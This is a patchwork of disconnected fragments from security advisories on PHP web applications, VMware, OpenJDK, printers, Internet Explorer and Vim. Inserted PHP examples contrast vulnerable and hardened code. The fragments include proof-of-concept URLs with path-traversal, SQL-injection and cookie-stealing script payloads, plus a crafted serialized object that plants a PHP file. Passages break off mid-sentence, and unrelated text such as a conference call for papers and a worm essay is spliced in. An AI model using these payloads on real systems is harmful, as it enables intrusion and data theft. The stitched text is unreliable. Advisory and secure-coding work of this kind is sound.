Reason: using unsanitized user submitted data for file operations
Attack vector: user submitted GET parameter "route"
Preconditions:
1. Windows platform
2. PHP version must be < 5.3.4 for null-byte attacks to work
Result: remote file disclosure, php remote code execution
Source code snippet from script "index.php":
-----------------[ source code start ]---------------------------------
// Router
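The snippet above breaks off before the file operation is reached. The following is an added example, not the advisory's index.php, showing the pattern the preconditions describe (a "route" parameter concatenated into an include path) next to a resolver that survives it. The "pages/" directory and the route names are assumptions.

```php
<?php
// Added example, not the advisory's index.php. "pages/" and the route names
// are assumed; the point is the difference between the two resolvers.

// Vulnerable pattern: the GET parameter is concatenated into a path and included.
// With route=../../../../boot.ini%00 on PHP < 5.3.4 the NUL byte truncates the
// path, discarding the ".php" suffix, so any readable file on the server can be
// disclosed; a file the attacker controls (an upload, a log) gives code execution.
function resolve_route_vulnerable(string $route): string
{
    return __DIR__ . '/pages/' . $route . '.php';
}

// Hardened resolver: accept only a plain identifier, then allowlist it,
// then confirm the resolved path really lives under pages/.
function resolve_route_safe(string $route): ?string
{
    $allowed = ['home', 'search', 'contact'];           // assumed route names
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $route)) {  // rejects NUL, "/", "\\" and "."
        return null;
    }
    if (!in_array($route, $allowed, true)) {
        return null;
    }
    $base = realpath(__DIR__ . '/pages');
    $path = $base === false ? false : realpath($base . '/' . $route . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                   // missing file or escaped the directory
    }
    return $path;
}

// Constructed inputs: the advisory's attack shape and a legitimate route.
$attack = "../../../../boot.ini\0";
var_dump(resolve_route_vulnerable($attack));   // NUL still embedded; include() on old PHP truncates there
var_dump(resolve_route_safe($attack));         // rejected by the identifier check
var_dump(resolve_route_safe('home'));          // a path only if pages/home.php exists

// Only after validation is it safe to include:
// $file = resolve_route_safe($_GET['route'] ?? 'home');
// if ($file === null) { http_response_code(404); exit; }
// include $file;
```

PHP 5.3.4 and later refuse paths containing a NUL byte, which removes the truncation trick but not the traversal: route=../../uploads/shell still includes any file that already ends in .php, so the allowlist and the realpath() containment check are needed on current PHP too.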
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting and cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
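The advisory gives only the PoC URL shape. The following added example, not SiT!'s kb.php, uses an in-memory SQLite database through PDO so it runs offline; the table, its rows, and the assumption that "start" ends up in an OFFSET clause are all constructed for the demonstration. It shows what an expression in place of SQL_CODE_HERE buys the attacker and how a typed, validated parameter closes it.

```php
<?php
// Added example, not SiT!'s kb.php. In-memory SQLite via PDO; table, rows and
// the LIMIT/OFFSET use of "start" are constructed for the demonstration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE kb_articles (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)');
$db->exec("INSERT INTO kb_articles VALUES (1, 'Public article', 1), (2, 'Internal draft', 0), (3, 'Another public one', 1)");

// Vulnerable: "start" is pasted into the OFFSET clause unchanged, so any
// expression the database accepts there is evaluated server-side.
function kb_page_vulnerable(PDO $db, string $start): array
{
    $sql = "SELECT id, title FROM kb_articles WHERE published = 1 LIMIT 10 OFFSET $start";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: validate as a non-negative integer and bind it as a typed parameter;
// anything else is refused rather than "cleaned up".
function kb_page_safe(PDO $db, string $start): ?array
{
    $offset = filter_var($start, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($offset === false) {
        return null;                                   // caller answers HTTP 400
    }
    $stmt = $db->prepare('SELECT id, title FROM kb_articles WHERE published = 1 LIMIT 10 OFFSET :off');
    $stmt->bindValue(':off', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed stand-in for SQL_CODE_HERE: a boolean-blind probe. The offset becomes
// 0 (rows come back) when the condition holds and 100 (nothing comes back) when it
// does not, so unpublished data is read one yes/no question at a time.
function probe(string $condition): string
{
    return "(SELECT CASE WHEN ($condition) THEN 0 ELSE 100 END)";
}

$rows = kb_page_vulnerable($db, probe("EXISTS (SELECT 1 FROM kb_articles WHERE title LIKE 'Internal%')"));
echo 'condition true:  ', count($rows), " rows\n";     // published rows returned
$rows = kb_page_vulnerable($db, probe("EXISTS (SELECT 1 FROM kb_articles WHERE title LIKE 'Secret%')"));
echo 'condition false: ', count($rows), " rows\n";     // offset 100, nothing returned

var_dump(kb_page_safe($db, probe('1=1')));             // rejected before any SQL runs
echo count(kb_page_safe($db, '1')), " rows\n";         // ordinary paging still works
```

The same probe works against MySQL, where the advisory's target runs, and the fix is the same: a numeric parameter is validated and bound as an integer, never interpolated, and a value that fails validation is answered with an error rather than silently coerced.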
structure your time however you see fit. If you think your
presentation will run longer, or have any special requirements, please
include this information in your submission and we will do our best to
accommodate you.
Note: If the presentation is based upon code or a particular
technique, the presenter must be one of the developers of the code or
technique and be prepared to perform a demonstration.
We look forward to reviewing your submissions, and anticipate another
great line-up for this year's conference. Once again, if you have any
http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes
Result: "MYSQL Error has occurred!"
-----------------------------[source code start]-------------------------------
if ($msg) {
$msg = trim($msg);
$res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver)."");
$user = mysql_fetch_assoc($res);
http://localhost/mkportal.1.2.1/index.php?ind=blog&op=p_gal
They can also upload image files to the server. File uploading can be
dangerous without proper security checks. So let's have a closer look
at the source code of "modules/blog/index.php" line ~2452:
---------------------[source code]---------------------
function upload_imm () {
global $mkportals, $DB, $mklib, $Skin, $_FILES;
Remote Firmware Update (RFU): The Remote Firmware Update (RFU) feature is enabled by default. A firmware update can be sent remotely to port 9100 without authentication. This could allow unauthorized modification of the device firmware. The unauthorized firmware could impact the confidentiality and integrity of data sent to and received from the device. The unauthorized firmware could also cause a Denial of Service (DoS) to the device.
RESOLUTION
The following steps can be taken to avoid unauthorized firmware updates:
Update the firmware to a version that implements code signing
Disable the Remote Firmware Update
The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates.
Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table.
- - Direct remote execution of arbitrary commands without user interaction.
- - Direct exploitation of IE bugs without user interaction. For example,
exploitation bugs that normally require the user to click on a URL
provided by the attacker can be exploited directly using this attack
vector.
- - Direct injection of scripting code in Internet Explorer. For example,
remotely injecting JavaScript code into the embedded IE control of the
AIM client.
- - Remote instantiation of Active X controls in the corresponding security
zone.
- - Cross-site request forgery and token/cookie manipulation using embedded
This vulnerability was discovered and researched by Jorge Luis Alvarez
Medina from Core Security Consulting Services (SCS). Additional research
was made by Federico Muttis from Core Security Exploit Writers Team (EWT).
8. *Technical Description / Proof of Concept Code*
Internet Explorer uses a feature known as URL Security Zones [2], which
defines a set of privileges for Web sites and applications depending on
their apparent level of trustworthiness. The zones available in the
product include:
IMPACT
------
By exploiting either of the VMware flaws described in this document,
user-mode code executing in a virtual machine may gain kernel
privileges within the virtual machine, dependent upon the guest
operating system. The flaws have been proven exploitable on x64
versions of Windows, and they have produced potentially exploitable
crashes on x64 versions of *BSD. The Linux kernel does not allow
exploitation of these flaws on x64 versions of Linux.
implementation of the Java platform. This combines the two previous
openjdk-6 advisories, DSA-2311-1 and DSA-2356-1.
CVE-2011-0862
Integer overflow errors in the JPEG and font parser allow
untrusted code (including applets) to elevate its privileges.
CVE-2011-0864
Hotspot, the just-in-time compiler in OpenJDK, mishandled
certain byte code instructions, allowing untrusted code
(including applets) to crash the virtual machine.
CVE-2008-0016
Justin Schuh, Tom Cross and Peter Williams discovered a buffer
overflow in the parser for UTF-8 URLs, which may lead to the
execution of arbitrary code. (MFSA 2008-37)
CVE-2008-0304
It was discovered that a buffer overflow in MIME decoding can lead
to the execution of arbitrary code. (MFSA 2008-26)
Vulnerability                  L    M    H    T
Session Fixation              [X]  [_]  [_]  [X]
mail() CRLF Injection         [X]  [_]  [_]  [_]
Local File Inclusion (+CSRF)  [_]  [X]  [_]  [X]
File Deletion (+CSRF)         [_]  [X]  [_]  [X]
File Upload Vulnerability     [_]  [_]  [X]  [X]
Code Execution (+CSRF)        [_]  [_]  [X]  [X]
Legend: L - Low risk   M - Medium risk   H - High risk   T - Tested
Risk level: Medium / High
1) Input passed to the "clientid" parameter in "www/admin/banner-
acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php",
"www/admin/advertiser-campaigns.php", "www/admin/campaign-
banners.php", and "www/admin/banner-activate.php" is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
the context of an affected site.
2) Input passed to the "orderdirection" and "listorder" parameters in
"www/admin/userlog-index.php" and "www/admin/stats.php" is not
properly sanitised before being returned to the user. This can be
IMPACT
------
By exploiting the VMware flaw described in this document, user-mode
code executing in a virtual machine may gain kernel privileges within
the virtual machine, dependent upon the guest operating system. The
flaw has been proven exploitable on x64 versions of Windows, and it
has produced potentially exploitable crashes on x64 versions of *BSD.
The Linux kernel does not allow exploitation of the flaw on x64
versions of Linux.
*Vulnerability Description*
Insufficient argument validation in the SSDT hooks installed by multiple
antivirus and firewall products (BitDefender Antivirus [1], Comodo
Firewall [2], Sophos Antivirus [3] and Rising Antivirus [4]) has been
found that could lead to a Denial of Service (DoS) and possibly to code
execution. An attacker utilizing these flaws could locally reboot the
whole system, shutting down the firewall or anti-virus protection. In
some cases it may be possible to extend the impact of these bugs to the
execution of arbitrary code in privileged kernel mode.
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in PHPShop CMS Free, which can be exploited to perform cross-site scripting and SQL injection attacks.
1) Path information appended to the URL of several scripts is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
The following PoC code is available:
http://[host]/phpshop/admpanel/banner/adm_baner_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/phpshop/admpanel/gbook/adm_gbook_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
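The PoC URLs append the payload as extra path data after the script name, which is the classic PHP_SELF reflection. The following is an added example, not PHPShop's code; it assumes the affected scripts build a form action from $_SERVER['PHP_SELF'], which on most SAPIs is SCRIPT_NAME plus the PATH_INFO suffix, and shows the fix beside it.

```php
<?php
// Added example, not PHPShop's code. Assumes the affected scripts emit
// $_SERVER['PHP_SELF'] into markup; PHP_SELF = SCRIPT_NAME + PATH_INFO.

// Vulnerable: PATH_INFO is attacker-controlled and lands unescaped in an attribute.
function form_open_vulnerable(array $server): string
{
    return '<form action="' . $server['PHP_SELF'] . '" method="post">';
}

// Hardened: SCRIPT_NAME never carries PATH_INFO, and it is HTML-encoded regardless,
// so a quote or angle bracket cannot terminate the attribute.
function form_open_safe(array $server): string
{
    $self = htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $self . '" method="post">';
}

// Constructed $_SERVER values for the first PoC URL above, after URL decoding.
$server = [
    'SCRIPT_NAME' => '/phpshop/admpanel/banner/adm_baner_new.php',
    'PATH_INFO'   => '/"><script>alert(document.cookie);</script>',
];
$server['PHP_SELF'] = $server['SCRIPT_NAME'] . $server['PATH_INFO'];

echo form_open_vulnerable($server), "\n";   // attribute closed early, script tag follows
echo form_open_safe($server), "\n";         // action is the script path only
```

Scripts that never expect extra path data can additionally refuse any request where $_SERVER['PATH_INFO'] is non-empty; that removes the reflection point entirely instead of relying on every output site encoding correctly.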
parameters passed from user mode. Additionally, some of the functions
accessible from user mode are inherently insecure and lead to easy
privilege escalation. All vulnerabilities are applicable to both
applications.
Analysis and code was developed for SUPERAntiSpyware v4.33.1000, but
the vendor released a new version of the product (v4.34.1000) - all
differences will be addressed and emphasized in technical details
below.
Vulnerable drivers:
These vulnerabilities were discovered and researched by Dan Crowley from
Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
8.1. *Nginx Web Server*
The following configuration snippet for Nginx Web Server will process
III) PHP filesystem functions path normalization attack
IV) PHP filesystem functions path normalization attack details
V) PHP filesystem functions path truncation attack
VI) PHP filesystem functions path truncation attack details
VII) The facts
VIII) POC and attack code
IX) Conclusions
X) References
I) Introduction
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Efront, which can be exploited to perform SQL injection and cross-site scripting attacks.
1) Input passed via the "course" GET parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?ctg=lesson_info&lessons_ID=1&course=%27%20onmouseover%3dalert%28document.cookie%29%3E
Application: Piwik <= 0.4.5
Severity: Piwik calls unserialize() on user input, which allows an
attacker to send a carefully crafted cookie that, when
unserialized, reuses Piwik's own classes to upload arbitrary
files or execute arbitrary PHP code
Risk: Critical
Vendor Status: Piwik 0.5.0 was released which fixes this vulnerability
Reference:
http://www.sektioneins.com/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability/
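The advisory describes the mechanism without code. The following is an added example, not Piwik's code: a class with a side-effecting destructor stands in for whichever application class the attacker reuses, the cookie is written by hand in PHP's serialization format (the attacker needs only the class and property names), and the data-only alternative is shown beside the vulnerable loader. The class name, property names and target path are assumptions.

```php
<?php
// Added example, not Piwik's code. CacheWriter stands in for an application
// class with a side-effecting __destruct()/__wakeup(); names are assumed.
class CacheWriter
{
    public $path;
    public $data;

    public function __destruct()
    {
        // Runs when the object is released, including objects that
        // unserialize() built from attacker-controlled bytes.
        if (is_string($this->path) && is_string($this->data)) {
            file_put_contents($this->path, $this->data);
        }
    }
}

// Vulnerable: rebuilds whatever object graph the cookie encodes.
function load_prefs_vulnerable(string $cookie): array
{
    $prefs = unserialize($cookie);
    return is_array($prefs) ? $prefs : [];   // a stray object is freed here, firing __destruct()
}

// Hardened: a data-only format cannot instantiate classes at all.
function load_prefs_safe(string $cookie): array
{
    $prefs = json_decode($cookie, true, 8);
    return is_array($prefs) ? $prefs : [];
}
// If unserialize() has to stay (PHP >= 7.0), forbid object creation outright;
// objects then arrive as __PHP_Incomplete_Class, which has no destructor:
//   unserialize($cookie, ['allowed_classes' => false]);

// Constructed attacker cookie in PHP's serialization format. In a real attack
// $target would be under the web root and $payload would be PHP code.
$target  = sys_get_temp_dir() . '/planted.php';
$payload = "<?php echo 'planted by unserialize'; ?>";
$cookie  = 'O:11:"CacheWriter":2:{'
         . 's:4:"path";s:' . strlen($target) . ':"' . $target . '";'
         . 's:4:"data";s:' . strlen($payload) . ':"' . $payload . '";}';

@unlink($target);
load_prefs_vulnerable($cookie);
var_dump(file_exists($target));   // the deserialized object's destructor wrote the file
@unlink($target);

load_prefs_safe($cookie);
var_dump(file_exists($target));   // nothing was instantiated, nothing was written
```

The loader never touches the object on purpose; returning an empty array is enough, because the damage is done when PHP frees the object. That is why sanitising the decoded value afterwards is no defence: the decision has to be made before unserialize() runs.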
software link......: http://www.efrontlearning.net/
tested versions....: 3.6.7 - 3.6.9 - 3.6.10
+-----------------------+
| Remote Code Execution |
+-----------------------+
The vulnerable code is located in /www/editor/tiny_mce/plugins/save_template/save_template.php
if ($_POST['templateName']) {
http://[host]/exportcsv/exportcsv_index.php?action=export_page&module=../../../../tmp/file
Successful exploitation of this vulnerability requires the attacker to be registered and logged in.
2) Input passed via the "sel_domain_id" POST parameter to /obm.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
<form action="http://[host]/obm.php" method="post">
These two facts combined could teach us a good lesson. But even after 1988
we have not learned how to deal with worms, and I think we have a long, long
way to go before we do. So imagine a worm using polymorphic techniques: it is
a nightmare worse than anything we have imagined.
-[ Polymorphic Code
This is not a new topic, and some researchers have been talking about it
for years, but all our attention was given to the shellcode. Even during my
research, when I talked to someone about the prospect of having real
polymorphic code, people always got confused with polymorphic
1. Summary
Product : Vim -- Vi IMproved
Version : Tested with 7.1.314 and 6.4
Impact : Arbitrary code execution
Wherefrom: Local and remote
Original : http://www.rdancer.org/vulnerablevim.html
Improper quoting in some parts of Vim written in the Vim Script can lead to
arbitrary code execution upon opening a crafted file.
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
HP Openview NNM 7.53 Invalid DB Error Code vulnerability
1. *Advisory Information*
June 2009 [9].
A vulnerability was found in the way that WordPress handles some URL
requests. It allows unprivileged users to view the content of plugin
configuration pages and, for some plugins, to modify plugin options and
inject JavaScript code. Arbitrary native code may be run by a malicious
attacker if the blog administrator runs injected JavaScript code that
edits the blog's PHP code. Many WordPress-powered blogs hosted outside
'wordpress.com' allow any person to create unprivileged users called
subscribers. Other sensitive username information disclosures were also
found in WordPress.
Gadu-Gadu is a free internet messenger used by millions of Polish people.
It lets users talk to, hear and even see other internet users over the net.
It also supports expressing feelings with a set of provided emoticons.
These emoticon strings, with their associated graphic filenames, are
stored in the "emots.txt" file.
The GG client is vulnerable to a buffer overflow in the code that copies
the "emots.txt" file data into local buffers. The program does not check
that the amount of data to copy fits in the destination buffer. Successful
exploitation may lead to arbitrary code execution or to denial of service
of the process (gg.exe termination).